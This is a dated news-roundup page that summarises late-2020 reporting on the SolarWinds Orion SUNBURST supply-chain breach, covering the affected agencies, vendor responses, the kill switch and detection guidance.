The state-sponsored hackers who breached US software provider SolarWinds earlier this year pivoted to Microsoft's internal network and then used Microsoft's own products to further the attacks against other companies. A US agency, CISA, had evidence of additional initial access vectors, other than the SolarWinds Orion platform.
Ref - ZDNet
_______________________________________________________________________________________
(December 17, 2020)
State-sponsored hackers breached the US think tank three times
A hacking group believed to be working for the Russian government has compromised the internal network of a think tank in the U.S. three times. The attacks between late 2019 and July 2020 named the threat actor Dark Halo, quickly switched to different tactics and techniques to carry out long-term, stealthy operations.
Ref - Bleeping Computer
_______________________________________________________________________________________
(December 17, 2020)
Microsoft identifies 40 more precise targets in ongoing’ SolarWinds hack
Microsoft president warned that the wide-ranging hack of SolarWinds' Orion IT software is ongoing, and that investigation reveals an attack that is remarkable for its scope, sophistication, and impact. The breach targeted several US government agencies and is believed to have been carried out by Russian nation-state hackers.
Ref - The Verge
_______________________________________________________________________________________
(December 17, 2020)
Microsoft denies infecting others in SolarWinds hack
Microsoft has confirmed that they were hacked in the recent SolarWinds attacks but denied that their software was compromised in a supply-chain attack to infect customers. Microsoft was not only compromised in the SolarWinds supply-chain attack but also had its software modified to distribute malicious files to its clients.
Ref - Bleeping Computer
_______________________________________________________________________________________
(December 17, 2020)
SolarWinds is not alone in a suspected Russian hack
The massive hacking campaign disclosed by U.S. officials this week and tentatively attributed to the Russian government extended beyond users of pervasive network software that had been compromised. Another major technology supplier was also compromised by the same attack team and used to get into high-value final targets.
Ref - CNBC
_______________________________________________________________________________________
(December 17, 2020)
Key safeguards for IT supply chains were missing - US Watchdogs
According to the report by the U.S. Government Accountability Office, 14 out of the 23 surveyed federal agencies hadn’t implemented any of the foundational practices meant to protect their information and communications technology supply chains. The surveyed agencies also included Commerce, Treasury, and State, which were targeted in the recent hacks.
Ref - Fortune
_______________________________________________________________________________________
(December 17, 2020)
Senators question IRS for SolarWinds hack
A bipartisan pair of senior senators have asked the Internal Revenue Service (IRS) to provide them with a briefing about the SolarWinds hack, suspecting that personal taxpayer information may have been stolen in the breach. They asked the details about how the IRS was mitigating potential damage, ensuring the hackers didn’t obtain access to internal IRS systems.
_______________________________________________________________________________________
(December 16, 2020)
More details on SolarWinds supply-chain attack
FireEye shared more details of their compromise and broke the news that they fell victim to a supply-chain attack involving the IT services company SolarWinds. The SolarWinds Orion software update had a backdoor (SUNBURST) injected into its code, which SolarWinds believed to have been included in updates released between March and June 2020.
Ref - Cyborg Security
_______________________________________________________________________________________
(December 16, 2020)
Hackers obtained 'God Access' during the SolarWinds hack.
A former White House official has warned that the SolarWinds breach potentially gave hackers "God access" or a "God door" to computer systems using the Orion IT software. On a scale of one to 10, this attack has been assigned a score of 9 by the former White House chief information officer.
_______________________________________________________________________________________
(December 16, 2020)
Tech firms have collaborated to create a kill switch for SolarWinds backdoor
Microsoft, FireEye, and GoDaddy have collaborated to create a kill switch for the SolarWinds Sunburst backdoor that forces the malware to terminate itself. They collaborated and used the avsvmcloud[.]com takeover to create a kill switch that unloads the Sunburst malware on infected machines.
Ref - Bleeping Computer
_______________________________________________________________________________________
(December 16, 2020)
Hundred of suspected victims of the SolarWinds breach identified
Security researchers are saying that they have made progress in decoding SUNBURST’s obfuscated communications methods. Chinese cybersecurity firm RedDrip Team published their findings on Github, saying its decoder tool had identified nearly a hundred suspected victims of the SolarWinds/Orion breach, including universities, governments, and high tech companies.
Ref - KrebsOnSecurity
_______________________________________________________________________________________
(December 16, 2020)
SolarWinds hack - one of the biggest hacks ever
According to researchers, this hack named Sunburst is one of the biggest ever cyber-attacks ever, and it could take years to fully comprehend it. It is said that the security teams across all affected organizations could take months trying to identify which emails were read, documents stolen or passwords compromised in the hack.
Ref - BBC
_______________________________________________________________________________________
(December 16, 2020)
Recommendations for monitoring SolarWinds supply chain attack with Sumo Logic Cloud SIEM
In this blog, Sumo Logic provides recommendations for Sumo Logic customers to gain a deeper understanding of how to utilize available Indicators of Compromise (IOCs) within our Cloud SIEM offerings to determine your exposure to the attack.
Ref - Sumo Logic
_______________________________________________________________________________________
(December 16, 2020)
SolarWinds/Orion compromise – Immediate action recommended
Optiv has created this list of recommendations to help reduce exposure to the SolarWinds supply chain attack.
Ref - Optiv
_______________________________________________________________________________________
(December 16, 2020)
Why is SolarWinds hack keeping security experts awake at night?
According to CNN, the SolarWinds attacks are very much concerning because of several reasons. Firstly, besides the three high-profile federal already compromised, there is a huge range of potential victims. Secondly, the attackers appear to have been extraordinarily skilled and determined. The third reason is the unusual and creative way used by hackers by disguising the initial attack within legitimate software updates issued by SolarWinds.
_______________________________________________________________________________________
(December 16, 2020)
Hackers leveraged SolarWinds' dominance against it for their spy campaign
The Texas-based company SolarWinds has been providing some level of monitoring or management to almost each and every database or an IT deployment model out there in the area. While hackers leveraged this dominance and turned it into a liability, cybersecurity experts are still struggling to understand the scope of the damage.
Ref - Reuters
_______________________________________________________________________________________
(December 16, 2020)
A security expert reported misconfiguration in SolarWinds' software in 2019
A security researcher said he warned SolarWinds in 2019 that the IT company's update server could be accessed by using the password "solarwinds123.” The revelation comes days after a massive hack of the Austin-based SolarWinds was made public, an attack that has since been confirmed to have infiltrated US government agencies. Though it is unclear which clients specifically were affected by the hack.
Ref - Business Insider
_______________________________________________________________________________________
(December 16, 2020)
No other products were compromised in a recent hack according to SolarWinds
IT software company SolarWinds has said that no other products were identified to contain malicious code similar to the one found in the Orion platform. The company's disclaimer comes after it carried out an internal audit of all its applications after news broke about the Russian state-sponsored hackers breaching its internal network and inserting malware inside Orion, the network monitoring and inventory platform.
Ref - ZDNet
_______________________________________________________________________________________
(December 16, 2020)
U.S. Senators ask for details from FBI on SolarWinds supply chain attack
A bipartisan group of U.S. senators has requested a government-wide report into the "highly sophisticated" cyberattack on SolarWinds from the FBI and the Cybersecurity and Infrastructure Security Agency (CISA).
Ref - Newsweek
_______________________________________________________________________________________
(December 16, 2020)
Microsoft announces plans to quarantine SolarWinds apps
Microsoft announced plans to start forcibly blocking and isolating versions of the SolarWinds Orion app that are known to have contained the Solorigate (SUNBURST) malware. Microsoft said that from December 16 at 8:00 AM PST, Microsoft Defender Antivirus will begin blocking the known malicious SolarWinds binaries. This will quarantine the binary even if the process is running.
Ref - ZDNet
_______________________________________________________________________________________
(December 15, 2020)
SolarWinds cyberattack leaves U.K. infrastructure exposed
It has been claimed that the cyber-attack on the U.S. technology company SolarWinds that has left U.K. infrastructure exposed, including the Home Office, National Health Service (NHS), and police forces, could take months to remove.
_______________________________________________________________________________________
(December 15, 2020)
SolarWinds hack may have a big impact on the D.C. contractors
In addition to high-profile federal agencies such as the Defense, Justice and State departments, and the Office of the President of the United States, SolarWinds also named prominent contractors such as Lockheed Martin Corp, General Dynamics Corp, and Booz Allen Hamilton Corp. among its customers. It is suspected that the scope of the intrusion is likely broader in comparison to the intrusion aimed at the Office of Personnel Management (OPM).
_______________________________________________________________________________________
(December 15, 2020)
A hacker named 'Fxmsp' sold access to SolarWinds machine
Years before a SolarWinds security breach that compromised the networks of multiple federal government agencies, a notorious hacker attempted to sell access to the company's computers on underground forums. The hacker, known as "fxmsp," was one of several individuals who attempted to sell access to SolarWinds machines in online forums during 2017.
Ref - Newsweek
_______________________________________________________________________________________
(December 15, 2020)
Microsoft, along with industry partners, seized a key domain used in the SolarWinds hack
Microsoft and a coalition of tech companies have intervened to seize and sinkhole a domain that played a central role in the SolarWinds hack. The domain (avsvmcloud[.]com) served as a command and control (C&C) server for malware delivered to around 18,000 SolarWinds customers via a trojanized update for the company's Orion app.
Ref - ZDNet
_______________________________________________________________________________________
(December 15, 2020)
NATO is assessing the damage from SolarWinds supply chain attack
The NATO Western military alliance is assessing the damage caused to its communication networks as a result of a massive hack that has rocked global institutions, including multiple agencies of the U.S. federal government and neighboring Canada. SolarWinds software is used by a wide range of governments and organizations, including some entities in NATO.
Ref - Newsweek
_______________________________________________________________________________________
(December 15, 2020)
SolarWinds attackers used a clever way to bypass multi-factor authentication
The hackers behind the supply chain attack that compromised public and private organizations have devised a clever way to bypass multi-factor-authentication systems. After having gained administrator privileges on the infected network, they used those unfettered rights to steal a Duo secret known as a key from a server running Outlook Web App.
Ref - Arstechnica
_______________________________________________________________________________________
(December 15, 2020)
Recent Sunburst targeted attacks
Various sources have recently disclosed a sophisticated attack that hit organizations via the supply chain. This was carried out via a compromised version of a network monitoring application called SolarWinds Orion. The attackers used the access provided by this application to plant a backdoor known as Sunburst onto affected machines. Trend Micro has provided detailed technical analysis as well as IOCs related to this attack.
Ref - Trend Micro
_______________________________________________________________________________________
(December 15, 2020)
Critical responses needed for all businesses after SolarWinds supply chain attack
The recent attacks on the U.S. Department of Homeland Security, Treasury Department, and FireEye are just scratching the surface of one of the most significant foreign hacking incidents in history. Over the long term, certain companies or agencies are likely to use this incident as a turning point to justify additional scrutiny of third-party software and safeguards against its abuse.
Ref - SCMagazine
_______________________________________________________________________________________
(December 15, 2020)
More details of the SolarWinds attack emerge
A likely Russia-based threat actor infecting thousands of organizations with malware delivered via seemingly legitimate software updates of their Orion network management product from SolarWinds. All enterprises running the company's Orion network management software should assume compromise and respond accordingly.
Ref - DarkReading
_______________________________________________________________________________________
(December 15, 2020)
Microsoft ensuring customers are protected from Solorigate supply chain attack
Microsoft is monitoring a dynamic threat environment surrounding the discovery of a sophisticated attack that included compromised binaries from legitimate software. These binaries, which are related to the SolarWinds Orion Platform, could be used by attackers to remotely access devices.
Ref - Microsoft
_______________________________________________________________________________________
(December 15, 2020)
SolarWinds released the second hotfix for the Orion platform
SolarWinds officially released a second hotfix to address a critical vulnerability in its Orion platform that was exploited to insert malware and breach public and private entities in a wide-ranging espionage campaign. The company urged its customers to update Orion Platform to version 2020.2.1 HF 2 immediately.
Ref - The Hacker News
_______________________________________________________________________________________
(December 15, 2020)
Thousands of businesses could have been affected by SolarWinds attack
Thousands of businesses and several branches of the US government are now thought to have been affected by the recent attack on software firm SolarWinds. The Austin-based company has fallen victim to a massive supply chain attack believed to be the work of state-sponsored hackers. It is suspected that over 18,000 organizations have used the affected version of its Orion platform.
Ref - TechRadar
_______________________________________________________________________________________
(December 15, 2020)
After news of SolarWinds breach, Capitol Hill turns attention to CISA
Cyber-savvy members of Congress were just beginning to respond, as of Tuesday morning, to news of breaches of at least three federal agencies’ networks by foreign hackers, but the early reaction from Capitol Hill focused on supporting the Cybersecurity and Infrastructure Security Agency to do more work to protect the government.
Ref - FedScoop
_______________________________________________________________________________________
(December 15, 2020)
SolarWinds attack explained: And why it was so hard to detect
A group believed to be Russia's Cozy Bear gained access to government and other systems through a compromised update to SolarWinds' Orion software. Most organizations aren't prepared for this sort of software supply chain attack.
Ref - CSO Online
_______________________________________________________________________________________
(December 15, 2020)
Five U.S agencies hacked in a major Russian cyberespionage campaign
Three more organizations, namely the Department of Homeland Security, the State Department, and the National Institutes of Health have joined the list of known victims of a months-long, highly sophisticated digital spying operation by Russia. Its damage remains uncertain but is presumed to be extensive, experts say.
Ref - Washington Post
_______________________________________________________________________________________
(December 15, 2020)
AlienVault: SolarWinds SUNBURST IOCs
AlientVault has accumulated the list of indicators of compromise (IOCs) for the SolarWinds SUNBURST supply chain attack.
Ref - AlientVault
_______________________________________________________________________________________
(December 15, 2020)
Sunburst backdoor: What to look for in your logs now - interview with an incident responder
FireEye published a report about a global intrusion campaign that utilized a backdoor planted in SolarWinds Orion. Attackers gained access to the download servers of Orion. They managed to infect signed installers downloaded by Orion users who had all reason to believe that the packages are safe and had not been tampered with.
Ref - GrayLog
_______________________________________________________________________________________
(December 15, 2020)
SolarWinds hack could have affected 18K Customers
The still-unfolding breach at network management software firm SolarWinds may have resulted in malicious code being pushed to nearly 18,000 customers, the company said in a legal filing on Monday. It is said that on Dec. 14, the software giant gained control over a key domain name avsvmcloud[.]com, that the SolarWinds hackers were using to communicate with systems compromised by the backdoored Orion product updates.
Ref - Krebsonsecurity
_______________________________________________________________________________________
(December 15, 2020)
Suspected Russian cybercriminals breached U.S DHS
A group of sophisticated hackers, which is believed to be working for the Russian government, managed to get access to internal communications in the U.S. Department of Homeland Security, according to people familiar with the matter. The breach was part of the campaign that penetrated the U.S. departments of Treasury and Commerce.
Ref - Reuter
_______________________________________________________________________________________
(December 14, 2020)
Canada assessing SolarWinds hack as U.S. agencies lockdown
Canadian security officials are eyeing a significant hack south of the border that appears to have penetrated top U.S. government agencies and left officials there scrambling to limit the damage.
Ref - Global News
_______________________________________________________________________________________
(December 14, 2020)
A backdoor inserted into SolarWinds' network monitoring software
The effects of the backdoor inserted into SolarWinds' network monitoring software on Britain's public sector are mounting the concerns, as tight-lipped government departments refuse to say whether UK institutions were accessed by Russian spies. It appears the downloads page for SolarWinds' platform was altered by Kremlin hackers.
Ref - The Register
_______________________________________________________________________________________
(December 14, 2020)
Adversaries infiltrated SolarWinds Orion software applications
In the past week the US Treasury, US Department of Commerce, and cybersecurity company FireEye experienced breaches tied to their reliance on software supply chains and a compromise of a SolarWinds software application. Officials stated that the exploit path demonstrated all signs of a nation-state sponsored cyberattack.
Ref - Sonatype
_______________________________________________________________________________________
(December 14, 2020)
The SolarWinds supply chain attack
Cisco Talos said that it is monitoring the announcements made by FireEye and Microsoft that a likely state-sponsored actor compromised potentially thousands of high-value government and private organizations around the world via the SolarWinds Orion product. The adversary gained access to victims’ networks via trojanized updates to SolarWinds’ Orion software.
Ref - Cisco
_______________________________________________________________________________________
(December 14, 2020)
US calls on federal agencies To power down SolarWinds Orion due to security breach
An emergency directive issued by the U.S. government calls on all federal civilian agencies to disconnect or power down SolarWinds Orion IT management tools because they are being used to facilitate an active exploit.
Ref - CRN
_______________________________________________________________________________________
(December 14, 2020)
Using Splunk to detect Sunburst backdoor
This blog contains some immediate guidance on using Splunk Core and Splunk Enterprise Security to protect (and detect activity on) your network from the Sunburst Backdoor malware delivered via SolarWinds Orion software.
Ref - Splunk
_______________________________________________________________________________________
(December 14, 2020)
SolarWinds SUNBURST backdoor supply chain attack: What you need to know
Rapid7 has deployed detections in InsightIDR for activity related to vulnerable versions of SolarWinds Orion and will continue to add additional IOCs/TTPs as they become available.
Ref - RAPID7
_______________________________________________________________________________________
(December 14, 2020)
Multiple U.S. agencies hit in cyberattack
The Pentagon, intelligence agencies, nuclear labs, and several Fortune 500 companies use software that was found to have been compromised by Russian hackers. The sweep of stolen data is still being assessed. Investigators were struggling to determine the extent to which entities were affected by the highly sophisticated attack.
Ref - NYTimes
_______________________________________________________________________________________
(December 14, 2020)
Dark Halo abuses SolarWinds tool to breach organizations
Volexity is releasing additional research and indicators associated with compromises impacting customers of the SolarWinds platform. Volexity has been able to tie these attacks to multiple incidents it worked in late 2019 and 2020 at a US-based think tank. Volexity tracks this threat actor under the name Dark Halo.
Ref - Volexity
_______________________________________________________________________________________
(December 14, 2020)
TrustedSec incident response team releases summary and guidance
In the wake of recent revelations regarding a supply chain compromise of the SolarWinds Orion platform by a nation-state actor, the TrustedSec Incident Response team has released a summary and guidance. The company revealed that the threat actor has been dubbed “UNC2452” by FireEye and the corresponding malware identified as “SUNBURST,” which has capabilities to deliver a memory-only dropper named “TEARDROP”.
Ref - Trustedsec
_______________________________________________________________________________________
(December 14, 2020)
A disruptive cyber crisis-affected multiple agencies
The sophisticated cyber campaign that breached email accounts across the federal government created a deepening crisis as signs multiplied about the scope of the foreign intruders’ reach. This is probably going to be one of the most consequential cyberattacks that happened in U.S. history. A new Cyber Response Group will activate a subsidiary body, known as a Unified Coordination Group, to streamline crisis collaboration between affected agencies.
Ref - Politico
_______________________________________________________________________________________
(December 14, 2020)
Around 18,000 customers were affected by the recent hack
Earlier, it was speculated that all of SolarWinds' customers were impacted. However, in SEC documents filed recently, SolarWinds said that of its 300,000 total customers, only 33,000 were using Orion, a software platform and that fewer than 18,000 are believed to have installed the malware-laced update.
Ref - ZDNet
_____________________________________________________________________________________
(December 14, 2020)
SolarWinds just released a security advisory
SolarWinds has been made aware that some of their systems experienced a highly sophisticated, manual supply chain attack. The attack impacted SolarWinds Orion versions 2019.4 HF 5 through 2020.2.1. This attack was likely conducted by an outside nation-state and intended to be a narrow, extremely targeted, and manually executed attack.
Ref - SolarWinds
_______________________________________________________________________________________
(December 14, 2020)
SolarWinds serves more than 425 Fortune500 organizations
The suspected Russia-led cyberattack had targeted IT monitoring software called Orion, developed by company SolarWinds, with malware pushed via booby-trapped updates. Solarwinds names a large number of U.S clients, including the Pentagon, State Department, NASA, NOAA, National Security Agency, Postal Service, Department of Justice, the Office of the President of the United States, and top five U.S. accounting firms.
Ref - NewsWeek
_______________________________________________________________________________________
(December 14, 2020)
US treasury and commerce departments targeted in cyber-attack
US federal agencies are hacked in a way that may have allowed a foreign power to monitor government communications. The treasury and commerce departments have both been attacked. And all federal civilian agencies have been told to disconnect from SolarWinds Orion, a computer network tool being abused by hackers.
Ref - BBC
_______________________________________________________________________________________
(December 14, 2020)
Russian government hackers are behind the compromise of U.S. agencies
The Treasury and Commerce departments, along with other U.S. government agencies, have been breached by the Russian government hackers, as a part of a global espionage campaign that stretches back months, according to people familiar with the matter. The breach was described as long-running and significant.
Ref - WashingtonPost
_______________________________________________________________________________________
(December 14, 2020)
Microsoft and FireEye verify SolarWinds supply chain attack
It has been identified that some hackers, believed to be operating on behalf of a foreign government, have breached software provider SolarWinds. After the breach, they deployed a malware-laced update for its Orion software to infect the networks of multiple US companies and government networks.
Ref - ZDNet
_______________________________________________________________________________________
(December 14, 2020)
US agencies examining the attack on government networks
The US Commerce Department has recently confirmed that it has been the victim of a data breach in a major cyber incident. In addition, the Department of Homeland Security's Cybersecurity and Infrastructure Security Agency also confirmed the data security incident.
Ref - CNN
_______________________________________________________________________________________
(December 14, 2020)
US Treasury and Commerce departments breached
The U.S. Treasury Department and the U.S. Department of Commerce were victims of a cyber breach. It was a sophisticated attack and it is said that very few entities are capable of carrying out such attacks. Authorities are investigating who was behind the breach.
Ref - ABCNews
_______________________________________________________________________________________
(December 14, 2020)
The US calls on federal agencies to stop using SolarWinds Orion
The U.S. government has called on all federal civilian agencies to power down SolarWinds Orion products immediately. It has been identified that they are being used as part of an active security exploit. An emergency directive comes in response to a known compromise involving SolarWinds Orion products.
Ref - CRN
_______________________________________________________________________________________
(December 14, 2020)
U.S. agencies attacked by Suspected Russian hackers
In one of the most valorous hacks in recent time, U.S. government agencies were attacked as part of a global campaign that exploited a flaw in the software updates of a U.S. company. The hackers are suspected to be part of a notorious hacking group tied to the Russian government.
Ref - Bloomberg
_______________________________________________________________________________________
(December 14, 2020)
The US government agencies attacked by hackers
U.S. government agencies were hit by a widespread campaign of cyber-attacks by hackers who were suspected of exploiting a flaw in the update of a U.S. software company, according to three people familiar with the investigation. The attacks included snooping on emails at the U.S. Treasury and Commerce Department.
Ref - IndianExpress
_______________________________________________________________________________________
(December 14, 2020)
US agencies hacked in a months-long spying campaign
As a part of a months-long global cyber espionage campaign, some hackers broke into the networks of the Treasury and Commerce departments. This has been disclosed just a few days after the prominent cybersecurity firm FireEye said it had been breached in an attack that industry experts said bore the hallmarks of Russian tradecraft.
Ref - APNews
_______________________________________________________________________________________
(December 14, 2020)
SolarStorm and SUNBURST Customer Coverage
Any organization utilizing SolarWinds Orion IT management software is potentially at risk from this threat. These organizations should immediately identify Orion systems in their network, determine if they are compromised with the SUNBURST backdoor, and seek out further evidence of compromise.
Ref - PaloAlto Networks
_______________________________________________________________________________________
(December 14, 2020)
US treasury hacked by foreign attackers
A serious hack has been detected, which has led to a national security council meeting at the White House. According to the sources, hackers backed by a foreign government have been monitoring internal email traffic at the US treasury department and an agency that decides internet and telecommunications policy.
Ref - The Guardian
_______________________________________________________________________________________
(December 14, 2020)
US departments targeted in cyber-attack
US federal agencies have been hacked in a way that may have let a foreign power monitor government communications. All the civilian agencies are told to disconnect from SolarWinds Orion, which is being exploited by malicious hackers. SolarWinds have 300,000 global customers including all five branches of the US military.
Ref - Yahoo
_______________________________________________________________________________________
(December 14, 2020)
Hackers breached the U.S Treasury Department
Hackers linked to a foreign government have breached the systems belonging to the U.S. Treasury Department and the National Telecommunications and Information Administration (NTIA) within the Commerce Department. As a result of the incursion, some files were stolen from both agencies.
Ref - The Hill
_______________________________________________________________________________________
(December 14, 2020)
Hackers attacked the U.S. Treasury and Commerce departments
Some hackers broke into the networks of US federal agencies, including the Treasury and Commerce departments. The attacks were revealed just days after the U.S. officials warned that cyber actors linked to the Russian government were attempting to exploit the vulnerabilities to target sensitive data. It appeared to be a large-scale penetration of U.S. government agencies.
Ref - Time
_______________________________________________________________________________________
(December 14, 2020)
Suspected Russian hackers hacked U.S. Treasury emails
According to people familiar with the matter, some hackers, believed to be working for Russia, have been monitoring internal email traffic in the U.S. Treasury and Commerce departments. They also added that it is feared these hacks are just the tip of the iceberg. The hack is so serious it led to a National Security Council meeting at the White House.
Ref - Reuters
_______________________________________________________________________________________
(December 13, 2020)
Microsoft releases security guide to stay protected from recent nation-state cyberattacks
Microsoft is sharing information and issuing guidance about increased activities from a sophisticated threat actor that is focused on high-value targets such as government agencies and cybersecurity companies. The firm believes this is nation-state activity on a significant scale, aimed at both the government and private sector.
Ref - Microsoft
_______________________________________________________________________________________
(December 13, 2020)
A global intrusion campaign abused widely-used IT infrastructure management software
A global campaign has been identified, that includes a compromise into the networks of public and private organizations through the software supply chain. This compromise is delivered through updates to the Orion network - a widely-used IT infrastructure management software from SolarWinds.
Ref - FireEye
_______________________________________________________________________________________
(December 13, 2020)
Hackers compromise SolarWinds Orion
SolarWinds Orion products (versions 2019.4 through 2020.2.1 HF1) are currently being exploited by malicious actors. CISA has determined that exploitation of SolarWinds products poses an unacceptable risk to Federal Civilian Executive Branch agencies and requires emergency action.
Ref - DHS
_______________________________________________________________________________________
(December 13, 2020)
The active abuse of SolarWinds software
The Cybersecurity and Infrastructure Security Agency (CISA) said that it is aware of active exploitation of SolarWinds Orion Platform software versions 2019.4 HF 5 through 2020.2.1 HF 1, released between March 2020 and June 2020. CISA encourages affected organizations to read the SolarWinds and FireEye advisories for more information and FireEye’s GitHub page for detection countermeasures.
Ref - US-CERT
_______________________________________________________________________________________
(December 13, 2020)
Highly invasive attacker abused SolarWinds supply chain
FireEye has uncovered a widespread campaign, that tracked as UNC2452. They gained access to victims via trojanized updates to SolarWind’s Orion IT monitoring and management software in order to distribute malware we call SUNBURST. This campaign may have begun as early as Spring 2020 and is currently ongoing. FireEye is releasing signatures to detect this threat actor and supply chain attack in the wild.
Ref - FireEye
Tags
Posted on: December 14, 2020
More from Cyware
Stay updated on the security threat landscape and technology innovations at Cyware with our threat intelligence briefings and blogs.
The Virtual Cyber Fusion Suite
